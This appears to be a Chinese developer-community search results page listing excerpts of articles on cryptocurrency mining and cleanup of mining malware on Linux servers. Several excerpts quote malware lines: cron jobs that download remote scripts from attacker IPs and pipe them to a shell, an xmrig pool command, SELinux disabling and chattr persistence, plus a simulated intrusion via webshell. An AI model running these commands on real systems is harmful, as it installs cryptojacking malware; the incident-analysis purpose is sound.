首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏全栈程序员必看

    eth挖矿软件_PI挖矿

    1 首先启动geth节点 geth –port 33333 –rpc –rpcapi eth –rpcaddr 192.168.10.176 –rpcport 8888 console 2 启动ethminer(挖矿软件) ethminer -G -P http://127.0.0.1:1234 –opencl-device 0 –opencl-platform 1 注意:只需要执行以上两步操作 ,不要添加其他参数或者启动后执行miner.start()操作 -G:启动GPU挖矿(通过opencl调用GPU挖矿) -P:geth地址 –opencl-device x :x代表启动的Gpu数量,默认全部启动 注意:启动GPU挖矿需要geth节点设置为挖矿节点才可以启动挖矿,并且geth的disk IO速度应该足够快,否则数据同步速度不能跟上主网区块产生速度,也无法挖矿.

    2.2K30编辑于 2022-11-10
  • 来自专栏我的安全视界观

    【应急能力提升2挖矿权限维持攻击模拟

    本文为整个专题的第二篇,攻击模拟的第一篇,主要模拟业务系统使用存在已知漏洞的CMS,导致被攻击,进而植入挖矿脚本的过程。 通过常见的信息收集方法(端口扫描、目录扫描、cms指纹识别等),获取目标对外开放的服务和使用的CMS;然后利用已知漏洞进行攻击,获取webshell;接着对内网进行信息收集,利用udf进行权限提升;最后植入挖矿脚本 emergency\phpstudy\tools\pear 19:10–19:11,将目标53端口映射到3389端口:F111.exe -l 53 -s 53 -r 3389 10.xx.xx.xx 5.7 运行挖矿文件 18:45,通过webshell上传挖矿程序xmrig.exe等四个文件 18:48,运行挖矿程序,系统CPU使用率开始飙升。 18:53,将挖矿程序添加到自启动中 19:06,注册挖矿程序服务,设置挖矿自启动 06 环境备份 攻击完成之后,不再做其他的操作,立马对环境创建快照,以免过多操作给应急人员带来太多干扰。

    98340编辑于 2022-05-11
  • 来自专栏全栈程序员必看

    python挖矿脚本代码_一个挖矿脚本

    登录查看后一个sshd2程序导致cpu负载高 仔细查看就知道和sshd是两个完全不同的进程,取名sshd2应该只是为了迷惑用户 ps -ef查看到父进程是一个/tmp/javax/config.sh, PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin while [ 1 ] do p=$(ps auxf|grep -v grep|grep sshd2| config.json echo >/tmp/6Tx3Wq echo >/tmp/vTtHH chattr +i /tmp/6Tx3Wq chattr +i /tmp/vTtHH p=(ps auxf|grep sshd2| name=””$p if [ -z “$name” ] then ps auxf|grep -v grep | awk ‘{if(3>=80.0) print nohup /tmp/javax/sshd2 发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/158472.html原文链接:https://javaforall.cn (ps auxf|grep sshd2|awk

    2.8K30编辑于 2022-09-14
  • 来自专栏白安全组

    挖矿木马详解

    攻击者通过各种手段将挖矿程序植入受害者的计算机中,在受害者不知情的情况下利用其计算机的云算力进行挖矿,从而获取利益,这类非法植入用户计算机的挖矿程序就是挖矿木马。 挖矿木马,挖的是啥? 门罗币交易价格可观; 2. 门罗币是一种匿名币,安全性更高; 3. 门罗币的算法通过计算机CPU和GPU即可进行运算,不需要其他特定的硬件支持; 4. 是否使用了全盘查杀,很多情况下安全软件的快速查杀只查杀特定目录; 2. 安装杀毒软件; 2. 及时更新病毒库; 3. 定时全盘查杀。 口令管理 1. 主机和数据库都要避免使用弱口令; 2. 避免多个设备使用相同口令。 漏洞管理 1. 定期对系统进行漏洞扫描,及时修复漏洞,特别是挖矿木马常用的“永恒之蓝”漏洞; 2. Web服务器要及时更新组件,安装软件补丁; 3. 对于数据库要及时更新数据库管理软件补丁。

    13.5K61发布于 2019-12-02
  • 来自专栏全栈程序员必看

    挖矿病毒分析

    发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/130081.html原文链接:https://javaforall.cn

    1.4K10编辑于 2022-08-10
  • 来自专栏全栈程序员必看

    挖矿脚本学习

    背景 日常应急响应过程中发现的挖矿脚本,对其进行分析发现写的质量该不错,可以学习下 样本分析及学习 SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin 来下载挖矿样本到/tmp/xms,并以bash来执行下载的挖矿样本。 之后再删除下载的挖矿样本/tmp/xms echo -e "*/1 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c ,用网上下载的$1文件替换 #get函数定义 get() { chattr -i $2; rm -rf $2 wget -q -O - $1 > $2 || curl -fsSL $1 -o $2 | sort -u -k2 | sort -n | cut -f2-) keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' '\n' | nl | sort -

    1.4K20编辑于 2022-09-07
  • 来自专栏全栈程序员必看

    kthreaddi挖矿病毒

    今天上服务器一查看cpu被占满了,使用了top命令一看,好家伙看到 kthreaddi 进程占用cpu300% 老子气坏了,没碰见过,什么是kthreaddi 白百度了一圈,原来【 kthreaddi 】是挖矿病毒 果然有一条定时任务,更加可气的是找不到这个文件 解决办法:删除这条命名,然后又top命名 kill -9 PID 杀死进程 貌似解决了问题 但是过一会 又创建了进程,定时任务又被重新写入了 这次我就查看挖矿进程的执行文件链接

    1.2K10编辑于 2022-08-25
  • 来自专栏全栈程序员必看

    挖矿病毒查杀

    这两天使用的公网服务器被入侵了,而且感染了不止一种病毒:一种是 libudev.so,是 DDoS 的客户端,现象就是不停的向外网发包,也就是超目标发起 DDoS 攻击;另外一种是挖矿程序,除了发包之外 XMR 挖矿程序 2.1 病毒特征 第二种病毒是门罗币(XMR)挖矿程序,门罗币似乎是今年年初涨得很快,所以用病毒入侵挖矿的手法也就出现了,病毒主要是通过下载脚本,运行后下载并启动挖矿程序来工作,脚本的内容如下 ,关于脚本的代码分析见于:XMR恶意挖矿案例简析,里面讲的非常详细。 /bin/sh setenforce 0 2>dev/null echo SELINUX=desabled > /etc/sysconfig/selinux 2>/dev/null sync && echo 参考资料 XMR恶意挖矿案例简析 金山云安珀实验室千里追踪75万台“肉鸡”控制源 记一次排除十字符libudev.so病毒的过程 FreeBuf 发布者:全栈程序员栈长,转载请注明出处:https://

    2.7K10编辑于 2022-09-01
  • 来自专栏全栈程序员必看

    linux挖矿病毒工具,Linux服务器挖矿病毒

    攻击者通过Redis未授权访问,写入定时任务,执行挖矿程序。 4096 2 / su 13587 root rtd DIR 202,2 4096 2 / su 13587 root txt REG 202,2 546680 1718717 /usr/sbin/sshd -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 44xdB6UmabC8R69V6jDj7q1zGyDzJ7ks5GJpLs3b2HpqWwWq2xbvLKiRjmX8e9oy7426goZG9kXRTgHj9SZPGzfiQYtbTw1 tmp/conn /tmp/conn: PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced 首先下载了一个图片,然后通过dd提取出来挖矿程序 这种通过Redis未授权拿服务器挖矿的情况很常见。 处理过程 1)redis增加认证,清空/var/spool/cron/root和authorized_keys。

    4K20编辑于 2022-06-30
  • 来自专栏全栈程序员必看

    挖矿病毒解决

    1、进程 cpu 100% watchdog 2、解决 /tmp netstat(矿池、鱼池、sup)进程,文件主程序 crontab -l 计划任务 分析脚本 3、如何进来的? 通过文件夹的创立时间快速推断出如何被感染 last登陆时间 last登陆失败的时间爆破的ip来定位出第一个中毒主机; –修复漏洞、清理后门、(关门,打狗) 6、防护策略-避免再犯同样问题–安全建议 IPtable吧挖矿常见端口全切断

    67910编辑于 2022-07-01
  • 来自专栏全栈程序员必看

    排查挖矿病毒

    而该269 进程则是挖矿病毒进行高度伪装,即使是kill 掉该进程也无济于事,后面又会自动跑起来。 top - 19:29:19 up 1:24, 2 users, load average: 41.71, 41.75, 41.46 Tasks: 891 total, 3 running, ,一般常规做法是 1、查找出具体哪个进程导致占比CPU;比如269; 2、kill 掉该挖矿进程;sudo kill -9 48124; 3、通过关键词查找挖矿病毒,一般在/tmp 目录底下,如果不清楚查找 说明挖矿病毒是通过早期开放的外网22号端口进行入侵,然后别人用爆破的方式通过22端口植入病毒,root等账号密码被破解。 程序将自动连接EDR管理中心 通过云查杀病毒 口令检测 SSH策略检测 身份鉴别策略组检测 对一些已感染的文件进行隔离病毒 安全防护 1、修改管理员和root 账号的密码,复杂度要高些; 2

    1.2K10编辑于 2022-07-01
  • 来自专栏深入浅出区块链技术

    比特币如何挖矿挖矿原理)-工作量证明

    在中本聪(比特币之父)的设计里,完成记账的节点可以获得系统给与的一定数量的比特币奖励,这个奖励的过程也就是比特币的发行过程,因此大家形象的把记账称为“挖矿”,本文将详细讨论这个过程。 个小写字母,10个数字中任一个),假设任何一个字符出现的概率是均等的,那么第一位为0的概率是1/62(其他位出现什么字符先不管),理论上需要尝试62次Hash运算才会出现一次第一位为0的情况,如果前两2位为 如此大的计算量需要投入大量的计算设备、电力等, 目前应该没有单矿工独立参与挖矿了,基本都是由矿工联合起来组成矿池进行挖矿(矿池里的矿工按算力百分比来分收益)。 从经济的角度讲,只有挖矿还有收益(比特币价格不断上涨也让收益变大),就会有新的矿工加入,从而加剧竞争,提高算力难度,挖矿就需要耗费更多的运算和电力,相互作用引起最终成本会接近收益。 假如节点有任何的作弊行为,都会导致网络的节点验证不通过,直接丢弃其打包的区块,这个区块就无法记录到总账本中,作弊的节点耗费的成本就白费了,因此在巨大的挖矿成本下,也使得矿工自觉自愿的遵守比特币系统的共识协议

    2.7K50发布于 2018-06-21
  • 来自专栏腾讯云安全的专栏

    云上挖矿如何预防?30秒看懂挖矿团伙8220

    关注腾讯云安全获取更多资讯 点右下角的【好看】 做个更好看的人 var first_sceen__time = (+new Date());if ("" == 1 && document.getElementById('js_content')) { document.getElementById('js_content').addEventListener("selectstart",function(e){ e.preventDefault(); }); } (function(){ if

    1.7K20发布于 2019-05-16
  • 来自专栏全栈程序员必看

    以太坊(ETH)挖矿最新教程_以太坊个人挖矿

    以太坊(ETH)挖矿最新教程 目前网上的大多数以太坊挖矿教程是很早整理编写的,基本都已过时不适用了。 但挖矿是一个技术持续升级更新的过程,因此根据最新实战情况编写了本文,并争取在以后抽时间持续保持跟进更新。 一.基本要求 ETH 挖矿主要是使用显卡来挖矿。 其中显卡决定挖矿的速度,主板、电源在很大程度上决定了矿机运行的稳定程度。附两张矿机图: 版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。

    4.2K10编辑于 2022-11-04
  • 来自专栏数据分析与挖掘

    动态规划--矿工挖矿

    问题描述:现有10个矿工,5个金矿,每个金矿有对应金子和需要开采的人数,问你最多能够获得多少金子?

    94820发布于 2020-08-26
  • 来自专栏全栈程序员必看

    linux 中了挖矿病毒

    文章目录 中毒特征磁盘cpu 跑满 100% 如何处理 反复发作 中毒特征磁盘cpu 跑满 100% 如何处理 电脑中了挖矿病毒 ps -aux | grep kinsing root 19447 :56 0:00 grep --color=auto kinsing 查看定时任务 crontab -l * * * * * wget -q -O - http://195.3.146.118/h2. sh | sh > /dev/null 2>&1 pkill -9 kinsing ps -aux | grep kinsing 终于删掉了 发布者:全栈程序员栈长,转载请注明出处:https:

    2.6K10编辑于 2022-06-27
  • 来自专栏全栈程序员必看

    linux——挖矿程序处理

    记一次挖矿程序入侵以及解决实操! 1,过程记录 系统被挖矿程序入侵,导致系统CPU飙升。kill掉进程后自动重启。 2,解决思路 1,crontab -e查看系统定时任务是否有恶意下载链接 2. top命令查看当前耗CPU进程,找到该进程文件所在位置 。 配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379. 2. 配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中. 3. 好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf 2.

    2.7K20编辑于 2022-07-04
  • 来自专栏全栈程序员必看

    以太坊挖矿回报率_eth挖矿难度曲线

    当然如果你是AMD的Tahiti, Tonga, Ellesmere(rx570), Baffin(rx560),还可以制定“-asm 2”,并在挖矿软件运行后用“+”或者“-”号键来微调“-dcri 直接比有些拒绝率高达3-5%的矿池提高收益3-5%; 2、延时低。 以上就是菜鸟提高收益的2个基本方法 以太坊挖矿的利润究竟有多大?为了正确地回答这个问题,让我们从头说起:先假设一台挖矿设备,然后使用合理的数据,再经过实际分析,看看以太坊挖矿可以赚到多少钱。 最后到挖矿设备关闭为止,总计获得的利润为2,916.59美元。但是,回顾一下本文开头,我们计算过投入的成本大约为3000美元,所以不难发现实际上是有点赔钱的。 这个机制实现后2-3年内,传统的挖矿就无法正常运行了,而挖矿设备也将被淘汰。届时,挖矿设备无法再产生利润。只有锁定股份的“股东”才能从以太坊区块链获益,而非矿工。

    2.1K10编辑于 2022-11-04
  • 来自专栏元宇宙112

    什么是DAPP挖矿

    众所周知,现在最大的挖矿不过是一些重复的计算,所有的项目方都想尽办法逃避“贪婪的用户”和羊毛军。 这也是现在“DAPP”挖矿的主要意图。   1000 (6).jpg 奖赏式挖矿:登录DAPP,能够取得一定的日常活泼或浏览奖赏,共享新用户能够取得奖赏。  当然,这也是现在最干流的方法。 2017年后,数字货币进入寒冬,比特币的传统挖矿职业也进入寒冬。各大电脑城都呈现了团体卖二手矿机拿回本钱的现象。  总结一下,这便是DAPP挖矿。有人用它来作为扩张地盘的奖赏,作为商场的品鉴品,有人用它来构建生态,真正用它。  哪个更好,要看谁真正处理了用户的实际问题。   

    1.2K20编辑于 2022-05-27
  • 来自专栏全栈程序员必看

    清除挖矿脚本 minerd

    ps -eopcpu,args –sort=%cpu|head 找到飙高的程序是minerd

    1.9K40编辑于 2022-09-14
领券